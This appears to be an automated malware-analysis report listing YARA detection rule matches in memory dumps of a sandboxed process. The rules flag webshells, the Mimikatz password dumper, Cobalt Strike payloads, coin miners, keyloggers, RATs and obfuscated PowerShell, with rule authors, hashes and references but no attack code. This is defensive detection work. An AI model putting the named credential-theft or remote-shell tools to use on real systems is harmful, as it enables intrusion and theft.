Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ham_backdoor author = Cylance Spear Team, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
